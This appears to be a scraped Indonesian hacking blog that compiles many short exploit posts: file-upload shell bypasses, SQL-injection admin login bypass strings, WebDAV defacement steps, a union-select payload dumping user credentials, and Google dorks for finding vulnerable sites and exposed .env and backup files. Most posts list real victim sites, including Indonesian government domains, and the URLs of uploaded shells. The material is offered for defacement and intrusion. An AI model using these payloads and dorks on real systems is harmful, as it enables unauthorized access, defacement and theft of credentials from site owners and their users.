Alwdy

# Exploit Title: Android FileUpload Vulnerability # Exploit Author: Mister klio # Contact : https://www.facebook.com/izzadiine # Youtube Tuturial : https://youtu.be/OJ-inNajTMI # Date: 6:20 PM 11/22/2017 # Category: Webapps # Language: PHP # Tested on: windows 7 / FireFox ################################################# ################################################# # Dork 1 : intext:"Index of /AndroidFileUpload" # Dork 2 :inurl:/AndroidFileUpload/ ################################# # Poc Vulnerable page : https://www.tutorialsee.com/AndroidFileUpload/fileUpload.php # Poc Upload : https://www.tutorialsee.com/AndroidFileUpload/index.html # others : https://yhpscool.yhps.tp.edu.tw/web/AndroidFileUpload//fileUpload.php ################################################# # Shell upload to : AndroidFileUpload/uploads/yourshell.php ################################################# # Remote Source Code : fileUpload.php #Script Php Download # Script CSRF Download

Download acunetix web vulnerability scanner V.9 Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Download acunetix web vulnerability scanner V.9 Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Acunetix adalah software untuk men-Scan kelemahan pada sebuah situs atau site. Menurut saya sendiri aplikasi ini sangata bagus, Menurut saya sendiri aplikasi ini memberikan 70% bug. Wow langsung saja download jika kalian tidak percaya Download Acunetix  Sekianlah Postingan Dari  All Tutor Cyber  tentang "Download acunetix web vulnerability scanner V.9" Semoga Bisa Bermanfaat! Anda Sekarang Sedang Membaca Postingan "Download acunetix web vulnerability scanner V.9" Dengan URL https://ryangueltoem.blogspot.co.id/ Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda. Sekian. Terim...

Deface Metode Webdav [Shell Upload] Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Webdav [Shell Upload] Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Mungkin di sini ada yang gak tau tentang Webdav??? Jika ingin tau tentang webdav baca aja di post post yg lama atau bisa juga DI SINI  Bahan Bahan : 1. Dork Webdav inurl:.tw.cn/*.asp inurl:.xj.cn/*.asp inurl:.xz.cn/*.asp inurl:.yn.cn/*.asp 2. Webdav dan Shell Marker [Di Sini] 3. Script Deface [Di Sini] 4. Kesabaran Step By Step : 1. Dorking Dork di atas menggunakan Gogle/Mozilla atau yg lainnya 2. Buka Webdav Pilih Webdav Kemudian Asp Shell Marker  3. Click Setting > Load Shell From Pile (Pilih Asp Shell marker yang udah kalian Download tadi)  Name Of Your Shell. Untuk mengubah nama shell ente tadi  (Lihat Gambar Supaya Lebih Jelas) 4. Click Add Site > Masukkan target/Web yang akan...

Deface Dengan Bypass Admin [ TERBARU ] Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Udah lama gak pernah ngposting artikel lagi :v maklum lagi sibuk dunia nyata, ngurus pacar wkwkwk :v Disini saya dengan nick GU3LT03M akan memposting tutorial Bypass Admin lengkap dengan dork fresh auto dapet web vuln, kalau ga dapet berarti kurang tamvan :v Kali ini saya sendiri (Admin) Akan memberikan Deface Dengan Bypass Admin [ TERBARU ] Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Bahan Bahan : 1. Dork ( Lihat di bawah ) 2. Shell Backdoor ( kalau gagal upload extensi .php coba diganti jadi .php.pjpeg atau .php.xxxjpg ) 3. Wajah yang tampan :) seperti admin GU3LT03M yang kegantengannya make banget :) 4. Kesabaran :) Dork :     inurl:/admin/upload/ "intext"     inurl:/admin/ "product"     inurl :/adm/img/ site:com     inurl:/admin/image/ Dork diatas dorking melalui google images Oke, la...

# Exploit Title: FlashChat File Upload Vulnerability # Google Dork: intitle:FlashChat v6.0.8 # Date: 02.10.2013 # Exploit Author: x-hayben21 # Vendor Homepage: www.punish3r.com # Software Link: http://www.tufat.com/script2.htm # Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7, # Tested on: Windows, PHP 5.2 # # Special Thanks : MaXtoR - PoLoNia ####################################################### #Vulnerable File : upload.php # Jika sukses maka seperti ini # Shell Akses : http://site/chat/temp/shell.php #Exploit <form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="Submit"> </form>

# Exploit Title: ZHATUO Admin Login Bypass upload sh3ll # Google Dork: intext:" Power by @ www.zhonli.net " # Date: 2017-11-13 # Author: iranonymous # Tested on: Win 7, Linux *************************************************** # Then Choose a Target and put this after URL :--> /admin/ # And fill username and password like the information below : # Username: '=' 'or'  # Password: '=' 'or' ====================================================== # Demo : http://www.zator.cn/admin/ # Sh3ll: http://www.zator.cn/wp.php

|Exploit Author:| MrTuRkIsH | Dork :| Todos os direitos reservados | ZPro 6.9.92 | 1249 acessos | Admin panel:| www.site.com/admin | admin:| '=' 'OR' | pass:| '=' 'OR' | DEMO:|  ************************************************************* http://www.tropicalfm92.com.br/ http://www.radioitajuba.com.br/ http://parentefm.com.br/

Dork : intitle:"AjaXplorer" ext:php "AjaXplorer" ext:php Exploit ; user & password : admin Live Target : http://sippd.jombangkab.go.id/cms/uploader/

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # inurl:/daftar.php "Choose File" # inurl:"/uploads/dokumen/" site:go.id # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian ###################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # intitle:"IndoXploit" filetype:php # intitle:"IndoXploit" intext:"public_html" filetype:php # intitle:"IndoXploit" intext:"mass deface" filetype:php # intitle:"IndoXploit" intext:"mass delete" filetype:php # intitle:"IndoXploit" intext:"jumping" filetype:php # intitle:"IndoXploit" intext:"config" filetype:php # intitle:"IndoXploit" intext:"config" filetype:php # intitle:"IndoXploit" intext:"fake root" filetype:php # intitle:"IndoXploit" intext:"auto edit user" filetype:php # intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php # intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php # intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php # intitle:"IndoXploit...

# contact : fb.com/mr.luciferz # Dork : inurl:/viewAdministrators.action # "filetype:action site:*.id" # intitle:Bamboo administrators intext:Bamboo administrators filetype:action # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian ##############################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # home : http://www.phpjabbers.com/ # Dork : Copyright © 2017 PHPJabbers.com intitle:Stiva Blog Script by PHPJabbers.com # intitle:Yellow Pages Script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Member Login Script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Knowledge Base Builder script by PHPJabbers.com intext:ADMIN LOGIN # intitle:Simple CMS | Login intext:ADMIN LOGIN # PHP Scripts Copyright © 2017 StivaSoft Ltd # inurl:content/index.php? intext:ADMIN LOGIN # inurl:/SimpleCMS intext:ADMIN LOGIN # inurl:webCMS/index.php? intext:ADMIN LOGIN # inurl:/visualVerge-Programs/webCMS/ # Powered by Sytek intext:ADMIN LOGIN # inurl:/app/web/img/ # inurl:/app/web/upload/files/ # ------------------------------------------------------------------------------------------------------------ # BUG : /core/third-party/filemanager/dialog.php # Result : /app/web/upload/tinymce-source/shell.php.accdb # Notice : Remember! Upload Shell with ...

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # intitle:"Index Of/am/revslider" # intitle:"Index Of/be/revslider" # intitle:"Index Of/il/revslider" # intitle:"Index Of/tr/revslider" # intitle:"Index Of/ro/revslider" # intitle:"Index Of/ca/revslider" # intitle:"Index Of/ge/revslider" # intitle:"Index Of/ba/revslider" # intitle:"Index Of/sy/revslider" # intitle:"Index Of/fi/revslider" # intitle:"Index Of/rs/revslider" # intitle:"Index Of/revslider # sh00tz : ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # HentaiC0de - IndoXploit - All Defacer Indonesian #################################################

# author : Mr.Luciferz # contact : fb.com/mr.luciferz # Dork : inurl:/media/source/ site:.id # BUG : /plugin/filemanager/dialog.php # ----------------------------------------- # Dork : inurl:/fm/source/ # BUG : /fm/filemanager/dialog.php # ----------------------------------------- # Dork : inurl:/clients/source/ ext:jpg # inurl:/clients/gallery/ ext:jpg # inurl:/clients/news/ ext:jpg # inurl:/assets/picture/ ext:jpg # inurl:/clients/channel/ ext:jpg # inurl:/clients/portfolio/ ext:jpg # inurl:/clients/banner/ ext:jpg # BUG : /assets/backend/tinymce/plugins/filemanager/dialog.php # /assets/files/plugins/filemanager/filemanager/dialog.php # --------------------------------------------------------- # Dork : Index of inurl:/source/ intext:source.txt # Notice : Remember! Upload Shell with ext php.fla / php.ndsfx / php5 / php.accdb / php.doc # sh00tz: ● Con7ext - Jembrix - Kakatoji - Ashura - grav3 ● # Thank's To For Exploit Khunerable # HentaiC0de - IndoXploit - Indonesian Hacker Rulez...

# contact : fb.com/mr.luciferz # BUG : /wp-content/themes/pronto/cjl/pronto/uploadify/check.php # /wp-content/plugins/1-flash-gallery/upload.php # /wp-content/themes/zcool-like/uploadify.php # /third-party/uploadify/uploadify.php # /lib/uploadify/custom.php # /wp-content/plugins/html5avmanager/lib/uploadify/custom.php # /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php # /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php # /wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php # /wp-content/themes/aim-theme/lib/js/old/uploadify.php # /wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php # /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php # /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php # /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php # /wp-content/plugins/comments_plugin/uploadify/uploadify.php # /wp-content/plugins/wp-crm/third-party/uploadify...

# Exploit Title: cc Simple Uploader Shell Upload Vulnerability # Date: 22-04-2012 # Author: Arm4dill0.DZ # Vendor or Software Link: none # Version: All Versions # Category: Web Applications # Google dork: inurl:/ccSimpleUploader/uploader.php # Tested on: Microsoft Windows 7 (version 6.1.7600) ; Mac OS X 10.7.3 # # Exploit : #    1- http://127.0.0.1/path/js/tiny_mce/plugins/ccSimpleUploader/uploader.php #    2- Upload your shell.php ( shell.php;.jpg , etc) #    3- Find the upload directory : /uplaod/;/uploads/;/uploaded/;/files/ #    4- ./Done  ;)

#Author : Ice-cream #Date : 07-04-2017 #tested : Linux ( Backbox ) , Windows 7 #thnks : Grac3 - Pak Haxor - Konslet - Lastc0de - Sanjungan Jiwa - Typical Idiot Security dork : intext:"by Faveo" "Submit a Ticket" POC : [-]register [-]check ur email,and click link activation [-]login [-]go to profile ( http://helpdesk.intisolusindojaya.com/public/client-profile ) [-]upload ur pic ( real pic dont use backdoor extension jpg ) [-]change extension jpg to php and change that jpg language or what ever i not understand about that to ur uploader or ur backdoor script use burpsuite [-]if done.. click right on ur profile picture and copy link location result : http://SITE.com/PATH/media/profilepic/urshell.php

# Exploit Title: VehicleWorkshop Unrestricted File Upload or Shell Upload # Exploit Author: Touhid M.Shaikh # Date: 1/08/2017 # Vendor Homepage: https://github.com/spiritson/VehicleWorkshop # Tested on : Kali Linux 2.0 64 bit and Windows 7 =================== Example : =================== http://www.addzambia.com/sellvehicle.php ==================== Vulnerable Source: ==================== --------------------------------PHP code----------- <?php if(isset($_POST["submit"])) { move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]); -------------------------------------------------- -----------------------HTML Form ----------------- <label for="images"></label> <label for="file"></label> <input type="file" name="file" id="file" /><input type="hidden" name="image" /> ---...

  dork : inurl:get_bthumb_jpg.php?im= BUG : /jscripts/tinymce/jscripts/tiny_mce/imagemanager/images.php EXAMPLE : http://www.tnp2k.go.id/jscripts/tinymce/jscripts/tiny_mce/imagemanager/manager.php https://www.kamarupa.co.id/jscripts/tinymce/jscripts/tiny_mce/imagemanager/manager.php RESULT : http://www.tnp2k.go.id/UserFiles/Image/z.htm https://www.kamarupa.co.id/UserFiles/Image/yusa.php.jpg

Exploit Title : Contentify Register And Upload Backdoor Author : ice-cream - khunerable Vendor Homepage : http://www.contentify.org/ Vendor Github : https://github.com/Contentify Date : 14 oct 2017 Tested on : Ubuntu 16.04.2 LTS ( BackBox ), Windows 7 dork : inurl:/registration/create intext:"TEAMS" "LATEST MATCHES" poc : [-]register [-]edit profile [-]upload my shell jpg ( tamper or burpsuite ) [-]if error.. you back to edit profile and refresh page.. [-]copy image location example http://www.crea-esports.at/ thnks for : All member typical idiot security - Gr4c3 - Konslet - All Indonesian Hacker

# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass # CVE: CVE-2015-2794 Step 1: find Dotnetnuke ver 07.04.00 Step 2: /Install/InstallWizard.aspx?__VIEWSTATE= Step 3: Fill all infor Step 4: CLick continue if it don't work, just add &culture=en-US&executeinstall or you get any error ex: 500,... just removing __VIEWSTATE= Install/InstallWizard.aspx?culture=en-US&executeinstall Step 5: Login /Home/tabid/36/ctl/Login/Default.aspx -> This Exploit work on 2013,2014,2015 version! TUTORIAL VIDEO https://www.youtube.com/watch?v=3zT80OxE5W0 Example Web Vulnerable : http://hr-system.mbk.co.id/

Thnks : Typical Idiot Security - Sanjungan Jiwa DORK inurl:/gambar/Image/ site:go.id BUG site/PATH/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash EXAMPLE http://dinkes.beraukab.go.id/dinkesadmin/editor/ POC [-]getting here for access file upload http://dinkes.beraukab.go.id/dinkesadmin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash [-]test create new dir.. if can create dir u can upload shell .php.fla [-]upload ur shell extension .php.fla RESULT http://dinkes.beraukab.go.id/dinkesadmin/editor/gambar/Flash/up.php.fla NB why use Type=Flash ? coz fla can upload in there

Laravel file .env DORK : intext:"index of" ".env" AND Many More Example : http://www.kansaicoatings.co.id/.env

AUTHOR : ice-cream THNKS : IndoXploit - Sanjungan Jiwa - Surabaya Blackhat - Typical Idiot Security site:go.id intext:"pengadilan" and many more.. EXAMPLE : http://pn-tegal.go.id/jdih.zip http://pn-pasirpengaraian.go.id/sipp.zip NB : If u was download that backup, u can look config file from that website

##################################################################################################################### #AUTHOR EXPLOIT : Ice-cream - Grac3 # #THNKS FOR : Sanjungan Jiwa Team - Surabaya Blackhat - Typical Idiot Security - Pak Haxor - Konslet - Lastc0de # ##################################################################################################################### LARAVEL FILE MANAGER DORK : inurl:/photos/shares/ site:kz ( and many more ) example : http://www.astyk-k.kz/laravel-filemanager nothing An error has occured: Internal Server Error but u can bypass upload 2 times look .. result : http://www.astyk-k.kz/photos/shares/1.php FOR VIDEO https://youtu.be/AApjlMlqekk

[+] Exploit Title ; Web3d cms Admin page bypass vulnerability [+] Date : 2017-11-12 [+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : https://web3d.co.il/ [+] Dork : intext:"Website builder and design company Web3D" [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Poc : [!] Username : 'or''=' [!] Password : 'or''=' [+] Target : [!] http://www.lextran.co.il/admin/index.php [!] Admin Panel : /admin/index.php

# Exploit Title : Text Test Upload - Arbitrary File Upload # Dorks : inurl:/tex/test/upload.php site:com # Dorks : inurl:/tex/test/upload.php site:org # Dorks : inurl:/tex/test/upload.php site:net # Contact : https://web.facebook.com/IzzAdiine?success=1&_rdr # Exploit Author: [Mister klio] ################################################# # SHARCH DORKS > # EXPLOIT POC : /tex/test/upload.php # UPLOAD YOUR FILE EN BYPASS EXENTION # EXEMPLE : Shels.php.leetjpg or Shells.php.leetpng # TEST Vuln : http://perso.crans.org/bussonnier/tex/test/upload.php # Enjoy

[+] Exploit Title : Parth International Admin Panel Bypass [+] [+] Dork : intext:2016 Parth International . All rights reserved. [+] [+] Author : Mr.T959 [+] Tested on : Windows 7 [+] [+]================================================================== [+] [+] Admin Panel : https://www.site.co.li/admin/index.php [+] Login With User : '=''or'@gmail.com [+] And Password : '=''or' [+] [+]================================================================== [+] [+] Demo : [+] http://metallino.co.in/admin/index.php

Deface SQL Lokomedia Full  Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface SQL Lokomedia Full  Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini Baiklah kembali lagi dengan saya Adewa. Kali ini saya akan memberikan tutorial Deface SQL Lokomedia Full Siapkan dulu alat alat dan bahan Bahan Bahan 1. Dork =  inurl:statis--profil.html                 inurl:statis--profil.html                 inurl:statis--strukturorganisasi.html       (Kembangin dorknya biar makin JOS) 2. Exploit      Exploit 1.=    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+       Exploit 2  =    'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+-...